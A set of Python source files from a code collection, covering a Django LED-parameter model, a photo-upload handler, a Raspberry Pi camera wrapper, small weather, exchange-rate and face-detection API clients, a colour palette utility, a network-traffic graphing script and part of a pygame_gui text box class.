colors[\"varia\"]))\n ret.append((\"U LED level 1\", \"187 & 188\",\n self.u_led_vl1_b2, colors[\"varia\"]))\n ret.append((\"U LED level 2\", \"189 & 190\",\n self.u_led_vl2_b2, colors[\"varia\"]))\n ret.append((\"U LED level 3\", \"191 & 192\",\n self.u_led_vl3_b2, colors[\"varia\"]))\n ret.append((\"U LED level 4\", \"193 & 194\",\n self.u_led_vl4_b2, colors[\"varia\"]))\n ret.append((\"U LED level 5\", \"195 & 196\",\n self.u_led_vl5_b2, colors[\"varia\"]))\n ret.append((\"U LED level 6\", \"197 & 198\",\n self.u_led_vl6_b2, colors[\"varia\"]))\n ret.append((\"CRC\", \"199 & 200\", self.crc_2b, colors[\"varia\"]))\n ret.append((\"Length block 1\", \"201\", self.length_block1_1b,\n colors[\"varia\"]))\n ret.append((\"Min lin dim (mA)\", \"202 & 203\",\n self.min_lin_dim_2b, colors[\"led\"]))\n ret.append((\"Dig dim freq (Hz)\", \"204 & 205\",\n self.digital_dim_freq_2b, colors[\"led\"]))\n ret.append((\"Vf treshold fast\", \"206\",\n self.vf_short_threshold_fast, colors[\"varia\"]))\n ret.append((\"Vf threshold slow\", \"207\",\n self.vf_short_threshold_slow, colors[\"varia\"]))\n ret.append((\"Min on time (ns)\", \"208 & 209\",\n self.min_on_time_2b, colors[\"varia\"]))\n ret.append((\"Nom voltage (x10mV)\", \"210 & 211\",\n self.nominal_voltage_2b, colors[\"led\"]))\n ret.append((\"Load type\", \"212\", self.load_type_1b, colors[\"led\"]))\n ret.append((\"AK power 1 win (W)\", \"213\",\n self.ak_power_1window_1b, colors[\"varia\"]))\n ret.append((\"AK power 2 win (W)\", \"214\",\n self.ak_power_2window_1b, colors[\"varia\"]))\n ret.append((\"Dual monitoring\", \"215\", self.dual_mon_1b, colors[\"led\"]))\n return ret\n\n def update_data_without_save(self, update):\n self.rel_year_1b = update[\"Relyear\"]\n self.rel_week_1b = update[\"Relweek\"]\n self.rel_ver_1b = update[\"Relversion\"]\n self.rel_not_used_1b = update[\"Relnotused\"]\n self.inv_rel_year_1b = update[\"Relyearinv\"]\n self.inv_rel_week_1b 
= update[\"Relweekinv\"]\n self.inv_rel_ver_1b = update[\"Relversioninv\"]\n self.inv_rel_not_used_1b = update[\"Relnotusedinv\"]\n self.type_1b = update[\"Type\"]\n self.nominal_current_2b = update[\"NomcurrentmA\"]\n self.nominal_voltage_1b = update[\"Nomvoltagex100mV1b\"]\n self.thermal_resistance_1b = update[\"ThermresCW\"]\n self.max_junction_temp_1b = update[\"MaxjunctempC\"]\n self.flux_bin_info_1b = update[\"Fluxbininfo\"]\n self.color_1b = update[\"Color\"]\n self.fitting_type_1b = update[\"Fittingtype\"]\n self.number_of_leds_1b = update[\"NumberofLEDs\"]\n self.led_revision_1b = update[\"LEDrevision\"]\n self.dimming_curve_14_2b = update[\"DC14AmA\"]\n self.dimming_curve_28_2b = update[\"DC28AmA\"]\n self.dimming_curve_34_2b = update[\"DC34AmA\"]\n self.dimming_curve_41_2b = update[\"DC41AmA\"]\n self.dimming_curve_48_2b = update[\"DC48AmA\"]\n self.dimming_curve_52_2b = update[\"DC52AmA\"]\n self.dimming_curve_55_2b = update[\"DC55AmA\"]\n self.dimming_curve_66_2b = update[\"DC66AmA\"]\n self.flux_comp_m25_1b = update[\"Fluxcompm25C\"]\n self.flux_comp_0_1b = update[\"Fluxcomp0C\"]\n self.flux_comp_25_1b = update[\"Fluxcomp25C\"]\n self.flux_comp_50_1b = update[\"Fluxcomp50C\"]\n self.flux_comp_75_1b = update[\"Fluxcomp75C\"]\n self.flux_comp_max_1b = update[\"FluxcompMax\"]\n self.reserved_version_2b = update[\"Reservedversion\"]\n self.year_1b = update[\"Progyear\"]\n self.month_1b = update[\"Progmonth\"]\n self.day_1b = update[\"Progdate\"]\n self.hour_1b = update[\"Proghour\"]\n self.led_pwm_l1_b2 = update[\"LEDPWMlevel1\"]\n self.led_pwm_l2_b2 = update[\"LEDPWMlevel2\"]\n self.led_pwm_l3_b2 = update[\"LEDPWMlevel3\"]\n self.led_pwm_l4_b2 = update[\"LEDPWMlevel4\"]\n self.led_pwm_l5_b2 = update[\"LEDPWMlevel5\"]\n self.led_pwm_l6_b2 = update[\"LEDPWMlevel6\"]\n self.u_led_vl1_b2 = update[\"ULEDlevel1\"]\n self.u_led_vl2_b2 = update[\"ULEDlevel2\"]\n self.u_led_vl3_b2 = update[\"ULEDlevel3\"]\n self.u_led_vl4_b2 = update[\"ULEDlevel4\"]\n self.u_led_vl5_b2 = update[\"ULEDlevel5\"]\n self.u_led_vl6_b2 = update[\"ULEDlevel6\"]\n self.crc_2b = update[\"CRC\"]\n self.length_block1_1b = update[\"Lengthblock1\"]\n self.min_lin_dim_2b = update[\"MinlindimmA\"]\n self.digital_dim_freq_2b = update[\"DigdimfreqHz\"]\n self.vf_short_threshold_fast = update[\"Vftresholdfast\"]\n self.vf_short_threshold_slow = update[\"Vfthresholdslow\"]\n self.min_on_time_2b = update[\"Minontimens\"]\n self.nominal_voltage_2b = update[\"Nomvoltagex10mV\"]\n self.load_type_1b = update[\"Loadtype\"]\n self.ak_power_1window_1b = update[\"AKpower1winW\"]\n self.ak_power_2window_1b = update[\"AKpower2winW\"]\n self.dual_mon_1b = update[\"Dualmonitoring\"]\n","sub_path":"koenvs_home/apps/params/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":25733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71929286","text":"import time\nimport zipfile\n\nfrom .models import GalleryImage\n\ndef process_upload(photo_list, form, user, status=''):\n \"\"\"\n Helper function that actually processes and saves the upload(s).\n Segregated out for readability.\n \"\"\"\n caption = contact_address = contact_city = contact_phone = ''\n status += \"beginning upload processing. Gathering and normalizing fields....<br>\"\n\n for upload_file in photo_list:\n upload_file.name = upload_file.name.lower().replace(' ', '_') # lowercase and replace spaces\n upload_name = upload_file.name\n\n status += \"File is %s. 
Checking for single file upload or bulk upload... <br>\" % upload_name\n if upload_name.endswith('.jpg') or upload_name.endswith('.jpeg'):\n status += \"Found jpg. Attempting to save... <br>\"\n # to do: proper dupe checking\n dupe = False\n if not dupe:\n upload = Upload(\n gallery_form = controller,\n sender_name = form.cleaned_data['name'],\n sender_email = form.cleaned_data['from_address'],\n photo = upload_file,\n contact_address = contact_address,\n caption = caption\n )\n upload.save()\n time.sleep(1)\n status += \"Saved and uploaded jpg.\"\n #except Exception, inst:\n # status += \"Error saving image: %s\" % (inst)\n\n elif upload_name.endswith('.zip'):\n \"\"\"\n We're going to do a bulk upload.\n For reference, see the gallery app or\n http://code.google.com/p/django-photologue/source/browse/trunk/photologue/models.py#194\n Also note use of custom storage. See: http://docs.djangoproject.com/en/dev/topics/files/\n \"\"\"\n status += \"Found zip. Attempting to process. <br>\"\n from django.core.files.base import ContentFile\n from cStringIO import StringIO\n\n working_zip = zipfile.ZipFile(upload_file)\n status += \"have working zip. Filelist is %s <br>\" % str(working_zip.namelist())\n bad_file = working_zip.testzip()\n if bad_file:\n status += '\"%s\" in the .zip archive is corrupt.<br>' % bad_file\n raise Exception('\"%s\" in the .zip archive is corrupt.' % bad_file)\n\n for filename in working_zip.namelist():\n if filename.startswith('__'): # do not process meta files\n continue\n if not filename.lower().endswith('.jpg'): # bail if it's not jpg\n continue\n status += \"beginning processing %s ... \" % filename\n\n data = working_zip.read(filename)\n if len(data):\n status += \"we have data. Attempting to test for validity <br> \"\n # test for truncated and broken images\n try:\n trial_image = Image.open(StringIO(data))\n trial_image.load()\n except Exception:\n continue\n filename = filename.replace(' ','_').replace('#','').replace('/','_')\n # test for dupes\n try:\n full_filename = 'uploaded/%s/%s/%s' % (datetime.datetime.today().year, controller.slug, filename)\n dupe = Upload.objects.get(photo=full_filename, controller=controller)\n except:\n if not ContentFile(data):\n return filename \n path = SimpleUploadedFile('uploaded/'+filename, data)\n upload = Upload(\n gallery_form = controller,\n sender_name = form.cleaned_data['name'],\n photo = path,\n caption = caption, \n )\n if faces:\n upload.sellable = True\n upload.faces = True\n upload.save()\n time.sleep(.5) # give a little breathing room for the server \n working_zip.close()\n status += \"bulk upload completed\"\n return status\n","sub_path":"photos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"518256009","text":"#!/usr/bin/env python3\n\nfrom picamera import PiCamera\nimport time\nimport datetime\nimport os\n\nclass PicamImpl:\n\n # Capture modes\n RAW_BAYER = 1\n MAX_RES = 2\n CONSISTENT = 3\n CUSTOM = 4\n\n def __init__(self, capture_mode=RAW_BAYER, root_dir='data', res_w=4056, res_h=3040, framerate=30, iso=100):\n self.capture_mode = capture_mode\n self.camera = PiCamera()\n self._init_parameters(res_w=res_w, res_h=res_h, framerate=framerate, iso=iso)\n self.set_save_directory(root_dir=root_dir)\n time.sleep(2)\n print(\"Camera ready\")\n\n def _init_parameters(self, override=False, **params):\n self.camera.resolution = (4056, 3040)\n self.camera.framerate = 30\n self.camera.iso = 
100\n\n        if self.capture_mode == self.CUSTOM or override:\n            if 'res_w' in params.keys() and 'res_h' in params.keys():\n                self.camera.resolution = (params['res_w'], params['res_h'])\n            if 'framerate' in params.keys():\n                self.camera.framerate = params['framerate']\n            if 'iso' in params.keys():\n                self.camera.iso = params['iso']\n\n        if self.capture_mode == self.RAW_BAYER:\n            self.bayer = True\n        else:\n            self.bayer = False\n\n        if self.capture_mode == self.CONSISTENT:\n            # Lock exposure and white balance so repeated captures are comparable\n            self.camera.shutter_speed = self.camera.exposure_speed\n            self.camera.exposure_mode = 'off'\n            g = self.camera.awb_gains\n            self.camera.awb_mode = 'off'\n            self.camera.awb_gains = g\n\n    def set_save_directory(self, *dir_levels, root_dir='data'):\n        dir_path = os.environ['PICAMERA_ROOT']\n        datestamp = datetime.datetime.now().strftime(\"%Y_%m_%d\")\n        self.save_dir = os.path.join(dir_path, root_dir, datestamp) + '/'\n        if len(dir_levels) > 0:\n            self.save_dir += '/'.join(dir_levels)+'/'\n        if not os.path.exists(self.save_dir):\n            os.makedirs(self.save_dir)\n        print(\"Setting save directory to %s\" % self.save_dir)\n\n    def capture_continuous(self):\n        break_capture = False\n        for filename in self.camera.capture_continuous(self.save_dir+'{timestamp:%Y-%m-%d-%H-%M-%f}.jpg'):\n            print(\"Captured %s\" % filename)\n            if break_capture:\n                break\n\n    def capture_single(self, root=None):\n        datestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%f\")\n        if root is not None:\n            datestamp = str(root)+\"_\"+datestamp\n        self.camera.capture(self.save_dir+datestamp+'.jpg', bayer=self.bayer)\n        return datestamp\n\n    def _filename_generator(self, duration):\n        start = time.time()\n        end = start+float(duration)\n        cur = time.time()\n        while cur < end:\n            datestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%f\")\n            yield self.save_dir+datestamp+'.jpg'\n            cur = time.time()\n\n    def capture_burst(self, duration):\n        self._init_parameters(res_w=800, res_h=600, override=True)\n        self.camera.capture_sequence(self._filename_generator(duration), use_video_port=True)\n        self._init_parameters()\n\n    def disconnect(self):\n        self.camera.close()","sub_path":"picamera/picam_lib/picam_impl.py","file_name":"picam_impl.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"301249028","text":"import requests\nimport json\n\nclass TestRequest():\n\n    def get_rates(self, basecurrency='USD'):\n        url = 'https://api.exchangeratesapi.io/latest?base=%s' % basecurrency\n        print(url)\n        response = requests.get(url)\n        return json.loads(response.text)\n\n\nif __name__ == '__main__':\n    test_request = TestRequest()\n    exchange_dict = test_request.get_rates()\n    print(exchange_dict['rates'])\n    # .items() yields (currency, rate) pairs; iterating the dict alone gives\n    # only the currency codes, so the two-name unpacking would fail.\n    for rate, value in exchange_dict['rates'].items():\n        print(rate, value)\n","sub_path":"lancamento/external_apis.py","file_name":"external_apis.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
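# Illustrative sketch (hypothetical, not one of the dataset records): a more
# defensive variant of the exchange-rate request above, adding a timeout and
# explicit HTTP error handling. The endpoint URL comes from the record;
# get_rates_safe and timeout_s are illustrative names only.
import requests

def get_rates_safe(base_currency="USD", timeout_s=10):
    """Return the parsed JSON payload, or None on network/HTTP failure."""
    url = "https://api.exchangeratesapi.io/latest?base=%s" % base_currency
    try:
        response = requests.get(url, timeout=timeout_s)
        response.raise_for_status()  # turn 4xx/5xx responses into exceptions
        return response.json()       # equivalent to json.loads(response.text)
    except requests.RequestException:
        return None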
+{"seq_id":"343052855","text":"\"\"\"\nCreated on: 23-09-2015\n\n@author: jjsalinas\n\npython3 - colores class for handling colours in RGB and hexadecimal formats\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport matplotlib.colors as colors\nimport numpy\n\"\"\"\nfunction: normalizar(v)\n    Converts an RGB-format vector with values in [0, 255]\n    into a normalized vector with values in [0.0, 1.0]\n\"\"\"\ndef normalizar(v):\n    res=[i/255 for i in v]\n    return res\n\n\"\"\"\nfunction: desnormalizar(v)\n    Converts a matplotlib-colour-format vector with values in [0.0, 1.0]\n    into an RGB vector with values in [0, 255]\n\"\"\"\ndef desnormalizar(v):\n    res=[int(255*i) for i in v]\n    return res\n\n\n\"\"\"\ncolores class\n@valores - array with the three RGB values of the colour\n@vhex - string with the hexadecimal value of the colour\n\"\"\"\nclass colores:\n    def __init__(self, vals=None, valHex=None):\n        if vals==None and valHex==None:\n            self.valores=[255,255,255]\n            self.vhex='#ffffff'\n        elif vals!=None:\n            self.valores=vals[:]\n            # rgb2hex returns a hex string; input is a 3-tuple with values in [0.0-1.0]\n            self.vhex=colors.rgb2hex(normalizar(self.valores))\n        elif valHex!=None:\n            self.vhex=valHex;\n            # hex2color takes a hex string and returns a tuple ([0.0-1.0], [0.0-1.0], [0.0-1.0]);\n            # desnormalizar turns that into an RGB vector with values 0-255\n            self.valores=desnormalizar(colors.hex2color(self.vhex))\n    \n    def setValores(self, vals):\n        self.valores=vals[:]\n        self.vhex=colors.rgb2hex(normalizar(self.valores))\n\n    def setVHex(self, valHex):\n        self.vhex=valHex;\n        self.valores=desnormalizar(colors.hex2color(self.vhex))\n\n    def getValores(self):\n        return self.valores\n\n    def getVHex(self):\n        return self.vhex\n    \n    # Draws a matplotlib square filled with the instance's current colour\n    def pintaCuadro(self):\n        if sum(self.valores)/3<125:\n            ctexto='#ffffff'\n        else:\n            ctexto='#000000'\n        fig1 = plt.figure()\n        ax1 = fig1.add_subplot(111, aspect='equal')\n        ax1.add_patch(\n            patches.Rectangle(\n                (0.0, 0.0),  # (x,y)\n                1.0,  # width\n                1.0,  # height\n                facecolor=self.vhex\n            )\n        )\n        left, width = .25, .5\n        bottom, height = .25, .5\n        right = left + width\n        top = bottom + height\n        ax1.text(top, right, self.vhex,\n                horizontalalignment='center',\n                verticalalignment='center',\n                fontsize=20, color=ctexto,\n                transform=ax1.transAxes)\n        \n        #fig1.savefig('rect1.png', dpi=90, bbox_inches='tight')\n        fig1.show()\n    \n    # Method that, starting from the colour held by this instance, generates a\n    # series of n colours such that each colour keeps proportion phi with the\n    # previous one in the series.\n    # Returns a tuple (list of colour objects, list of hex values)\n    def serie(self, n): \n        phi=(1+numpy.sqrt(5))/2\n        cbase=self.vhex\n        #v=desnormalizar(colors.hex2color((cbase)))\n        v=self.valores[:]\n\n        color1=colores(valHex=cbase)\n        \n        vcols=[color1]\n        vh=[color1.getVHex()]\n        \n        vphi=v[:]\n        for i in range(n - 1):  # n colours in total, counting the base colour\n            vphi=[int(c*phi)%255 for c in vphi]\n            colorphi=colores(vphi)\n            vcols.append(colorphi)\n            vh.append(colorphi.getVHex())\n        return vcols, vh\n        #paleta(vh, 10)\n    \n#*****************************************************************************#\n#*****************************************************************************#\n#*****************************************************************************#\n\n# Draws a palette of 5 or 10 colours from a list of hexadecimal values\ndef paleta(lcols_hex, l=5):\n    if l==5:\n        assert(len(lcols_hex)==5)\n        x=0.2\n    elif l==10:\n        assert(len(lcols_hex)==10)\n        x=0.1\n    else:\n        return \"2nd argument must be =5 or =10\"\n    \n    fig1 = plt.figure()\n    ax1 = fig1.add_subplot(111, aspect='equal')\n    \n    for i in range(l):\n        ax1.add_patch(\n            patches.Rectangle(\n                (x*i, 0.0),  # (x,y)\n                x,  # width\n                1.0,  # height\n                facecolor=lcols_hex[i]\n            ) \n        )\n    fig1.show()\n\n","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
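# Illustrative sketch (hypothetical, not one of the dataset records): the
# hex <-> RGB round trip that normalizar/desnormalizar in the record above are
# built around, using matplotlib.colors directly. The two helper names below
# are illustrative, not from the original file.
import matplotlib.colors as mcolors

def rgb255_to_hex(rgb):
    # [0, 255] integer channels -> '#rrggbb'
    return mcolors.rgb2hex([c / 255 for c in rgb])

def hex_to_rgb255(hex_str):
    # '#rrggbb' -> [0, 255] integer channels
    return [int(255 * c) for c in mcolors.hex2color(hex_str)]

assert hex_to_rgb255(rgb255_to_hex([255, 128, 0])) == [255, 128, 0]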
+{"seq_id":"584803727","text":"import subprocess\nimport re\nimport os.path\nimport rrdtool\n\ndestinations = {}\n\nif __name__ == \"__main__\":\n\n    # Scrape pmacct stats\n    # check_output returns bytes on Python 3, so decode before splitting on '\n'\n    out = subprocess.check_output(\"/usr/local/bin/pmacct -s\", shell=True).decode('utf-8')\n    for row in out.split('\n'):\n        if 'DST_IP' in row:\n            continue\n        try:\n            line = re.sub(' +',' ',row).split(' ')\n            ipaddr = line[0]\n            packets = line[1]\n            nbytes = line[2]\n            #print \"IP: {0} PACKETS: {1} BYTES: {2}\".format(ipaddr, packets, nbytes)\n            destinations[ipaddr] = packets, nbytes\n        except:\n            break\n\n    # Generate graphs\n    for dst in destinations:\n        # This cuts the cruft off the end of the pmacct output\n        rrdfile = '{0}.rrd'.format(dst)\n        pngfile = '{0}.png'.format(dst)\n        rrdfileescaped = '{0}.rrd'.format(dst).replace(':', '\\\\:')\n        \n        #print \"GENERATING file {0} FROM {1}\".format(pngfile, rrdfile)\n        if not os.path.exists('{0}'.format(rrdfile)):\n            continue\n\n        ret = rrdtool.graph('{0}'.format(pngfile), '--start', 'end-36h', '--vertical-label=Bits/s',\n              '--title', dst, '--width', '600', '--height', '120',\n              'DEF:bits={0}:bits:LAST'.format(rrdfileescaped),\n              'CDEF:octets=bits,8,*',\n              'AREA:octets#66FF00:Inbound')\n","sub_path":"pmgraph.py","file_name":"pmgraph.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
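# Illustrative sketch (hypothetical, not one of the dataset records): the
# pmacct scraper above collapses repeated spaces with re.sub before splitting.
# The same row parsing can be done with str.split(), which already collapses
# arbitrary whitespace; the sample bytes below are made up for illustration.
sample = b"DST_IP      PACKETS  BYTES\n10.0.0.1  42   6400\n10.0.0.2   7    980\n"

parsed = {}
for row in sample.decode("utf-8").splitlines():
    if "DST_IP" in row or not row.strip():
        continue  # skip the header row and blank lines
    fields = row.split()  # no regex needed: split() collapses repeated spaces
    if len(fields) >= 3:
        parsed[fields[0]] = (fields[1], fields[2])

assert parsed["10.0.0.1"] == ("42", "6400")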
resp[0][\"faceAttributes\"][\"age\"]\n\n data[\"right-pupil-x\"] = resp[0][\"faceLandmarks\"][\"pupilRight\"][\"x\"]\n data[\"right-pupil-y\"] = resp[0][\"faceLandmarks\"][\"pupilRight\"][\"y\"]\n data[\"left-pupil-x\"] = resp[0][\"faceLandmarks\"][\"pupilLeft\"][\"x\"]\n data[\"left-pupil-y\"] = resp[0][\"faceLandmarks\"][\"pupilLeft\"][\"y\"]\n data[\"yaw\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"yaw\"]\n data[\"roll\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"roll\"]\n data[\"pitch\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"pitch\"]\n\n #print \"Data is: \" + str(data)\n return data\n\n\ndef getEmotionArray(data):\n listing = []\n listing.append(data[\"Anger\"])\n listing.append(data[\"Contempt\"])\n listing.append(data[\"Disgust\"])\n listing.append(data[\"Fear\"])\n listing.append(data[\"Happiness\"])\n listing.append(data[\"Neutral\"])\n listing.append(data[\"Sadness\"] )\n listing.append(data[\"Surprise\"] )\n\n return listing\n","sub_path":"Microsoft.py","file_name":"Microsoft.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39922751","text":"import json\nimport requests\n\nOPENWEATHERMAP_API_KEY = \"55d79b326f3720654f6ab31b68231d4a\"\n\nclass WeatherInfo:\n def __init__(self,city_name, country, temp, wind_speed, wind_deg):\n self.city_name = city_name\n self.country = country\n self.temp_K = temp\n if self.temp_K is not None:\n self.temp_C = round(self.temp_K - 273, 2)\n else:\n self.temp_C = None\n self.wind_speed = wind_speed\n self.wind_deg = wind_deg\n\n @staticmethod\n def from_json(json_data):\n city_name = json_data['name']\n country_name = json_data ['sys']['country']\n temp = json_data['main']['temp']\n wind_speed = json_data['wind']['speed']\n wind_deg = json_data['wind']['deg']\n weather_info = WeatherInfo(\n city_name, country_name, temp, wind_speed, wind_deg\n )\n return weather_info\n\ndef get_weather_data(city_name):\n site_url = \"api.openweathermap.org/data/2.5/weather\"\n city = f\"q={city_name}\"\n app_id = f\"appid={OPENWEATHERMAP_API_KEY}\"\n\n\n url=f\"https://{site_url}?{city}&{app_id}\"\n response = requests.get(url)\n json_data = response.json()\n if json_data['cod'] !=200:\n weather_info = WeatherInfo(city_name, None, None, None, None)\n else:\n weather_info = WeatherInfo.from_json(json_data)\n return weather_info\n\n\nif __name__ == '__main__':\n weather_data = get_weather_data(\"London\") # nimmt immer Stadt mit höchster Einwohnerzahl\n\n print(f\"Weather in {weather_data.city_name}\")\n print(f\"Windspeed {weather_data.wind_speed}\")\n print(f\"Wind direction {weather_data.wind_deg}°\")\n print (f\"Temperature {weather_data.temp_K} K ({weather_data.temp_C} °C)\")","sub_path":"Flask/json_main.py","file_name":"json_main.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184299816","text":"import pygame\nimport warnings\nimport math\n\nfrom typing import Union, Tuple\n\nfrom pygame_gui import ui_manager\nfrom pygame_gui.core import ui_container\nfrom pygame_gui.core.ui_element import UIElement\nfrom pygame_gui.elements.ui_vertical_scroll_bar import UIVerticalScrollBar\n\nfrom pygame_gui.elements.text.html_parser import TextHTMLParser\nfrom pygame_gui.elements.text.text_effects import TypingAppearEffect, FadeInEffect, FadeOutEffect\nfrom pygame_gui.core.drawable_shapes import RectDrawableShape, RoundedRectangleShape\nfrom 
pygame_gui.core.ui_appearance_theme import ColourGradient\n\n\nclass UITextBox(UIElement):\n \"\"\"\n A Text Box element lets us display word-wrapped, formatted text. If the text to display is longer than the height\n of the box given then the element will automatically create a vertical scroll bar so that all the text can be seen.\n\n Formatting the text is done via a subset of HTML tags. Currently supported tags are:\n\n - <b></b> or <strong></strong> - to encase bold styled text.\n - <i></i>, <em></em> or <var></var> - to encase italic styled text.\n - <u></u> - to encase underlined text.\n - <a href='id'></a> - to encase 'link' text that can be clicked on to generate events with the id given in href.\n - <body bgcolor='#FFFFFF'></body> - to change the background colour of encased text.\n - <br> - to start a new line.\n - <font face='verdana' color='#000000' size=3.5></font> - To set the font, colour and size of encased text.\n\n More may be added in the future if needed or frequently requested.\n\n NOTE: if dimensions of the initial containing rect are set to -1 the text box will match the final dimension to\n whatever the text rendering produces. This lets us make dynamically sized text boxes depending on their contents.\n\n\n :param html_text: The HTML formatted text to display in this text box.\n :param relative_rect: The 'visible area' rectangle, positioned relative to it's container.\n :param manager: The UIManager that manages this element.\n :param wrap_to_height: False by default, if set to True the box will increase in height to match the text within.\n :param layer_starting_height: Sets the height, above it's container, to start placing the text box at.\n :param container: The container that this element is within. If set to None will be the root window's container.\n :param parent_element: The element this element 'belongs to' in the theming hierarchy.\n :param object_id: A custom defined ID for fine tuning of theming.\n \"\"\"\n\n def __init__(self, html_text: str,\n relative_rect: pygame.Rect,\n manager: ui_manager.UIManager,\n wrap_to_height: bool = False,\n layer_starting_height: int = 1,\n container: ui_container.UIContainer = None,\n parent_element: UIElement = None,\n object_id: Union[str, None] = None):\n\n new_element_ids, new_object_ids = self.create_valid_ids(parent_element=parent_element,\n object_id=object_id,\n element_id='text_box')\n super().__init__(relative_rect, manager, container,\n starting_height=layer_starting_height,\n layer_thickness=1,\n element_ids=new_element_ids,\n object_ids=new_object_ids\n )\n self.html_text = html_text\n self.font_dict = self.ui_theme.get_font_dictionary()\n\n self.wrap_to_height = wrap_to_height\n self.link_hover_chunks = [] # container for any link chunks we have\n\n self.active_text_effect = None\n self.scroll_bar = None\n self.scroll_bar_width = 20\n\n self.border_width = None\n self.shadow_width = None\n self.padding = None\n self.background_colour = None\n self.border_colour = None\n\n self.link_normal_colour = None\n self.link_hover_colour = None\n self.link_selected_colour = None\n self.link_normal_underline = False\n self.link_hover_underline = True\n self.link_style = None\n\n self.rounded_corner_offset = None\n self.formatted_text_block = None # TextLine()\n self.text_wrap_rect = None\n self.background_surf = None\n\n self.drawable_shape = None\n self.shape_type = 'rectangle'\n self.shape_corner_radius = None\n\n self.rebuild_from_changed_theme_data()\n\n def rebuild(self):\n \"\"\"\n Rebuild whatever needs 
building.\n\n \"\"\"\n ''' The text_wrap_area is the part of the text box that we try to keep the text inside of so that none \n of it overlaps. Essentially we start with the containing box, subtract the border, then subtract \n the padding, then if necessary subtract the width of the scroll bar'''\n self.rounded_corner_offset = int(self.shape_corner_radius - (math.sin(math.pi/4) * self.shape_corner_radius))\n self.text_wrap_rect = [(self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[2] - (self.padding[0] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset)),\n (self.rect[3] - (self.padding[1] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset))]\n if self.rect[3] == -1:\n self.text_wrap_rect[3] = -1\n\n self.parse_html_into_style_data() # This gives us the height of the text at the 'width' of the text_wrap_area\n if self.formatted_text_block is not None:\n if self.wrap_to_height or self.rect[3] == -1:\n final_text_area_size = self.formatted_text_block.final_dimensions\n self.rect.size = [(final_text_area_size[0] + (self.padding[0] * 2) +\n (self.border_width * 2) + (self.shadow_width * 2) +\n (2 * self.rounded_corner_offset)),\n (final_text_area_size[1] + (self.padding[1] * 2) +\n (self.border_width * 2) + (self.shadow_width * 2) +\n (2 * self.rounded_corner_offset))]\n\n elif self.formatted_text_block.final_dimensions[1] > self.text_wrap_rect[3]:\n # We need a scrollbar because our text is longer than the space we have to display it.\n # this also means we need to parse the text again.\n text_rect_width = (self.rect[2] - (self.padding[0] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - self.rounded_corner_offset - self.scroll_bar_width)\n self.text_wrap_rect = [(self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n text_rect_width,\n (self.rect[3] - (self.padding[1] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset))]\n self.parse_html_into_style_data()\n percentage_visible = self.text_wrap_rect[3] / self.formatted_text_block.final_dimensions[1]\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n\n if self.scroll_bar is not None:\n self.scroll_bar.kill()\n self.scroll_bar = UIVerticalScrollBar(pygame.Rect(scroll_bar_position,\n (self.scroll_bar_width,\n self.rect.height - (2 * self.border_width) -\n (2 * self.shadow_width))),\n percentage_visible,\n self.ui_manager,\n self.ui_container,\n parent_element=self)\n else:\n self.rect.size = [self.rect[2], self.rect[3]]\n\n theming_parameters = {'normal_bg': self.background_colour,\n 'normal_border': self.border_colour,\n 'border_width': self.border_width,\n 'shadow_width': self.shadow_width,\n 'shape_corner_radius': self.shape_corner_radius}\n\n if self.shape_type == 'rectangle':\n self.drawable_shape = RectDrawableShape(self.rect, theming_parameters,\n ['normal'], self.ui_manager)\n elif self.shape_type == 'rounded_rectangle':\n self.drawable_shape = RoundedRectangleShape(self.rect, theming_parameters,\n ['normal'], self.ui_manager)\n\n 
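        # The compositing below draws the themed background surface first, then
        # blits the pre-rendered text block on top, clipped to 'drawable_area',
        # whose vertical offset tracks the scroll bar position.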
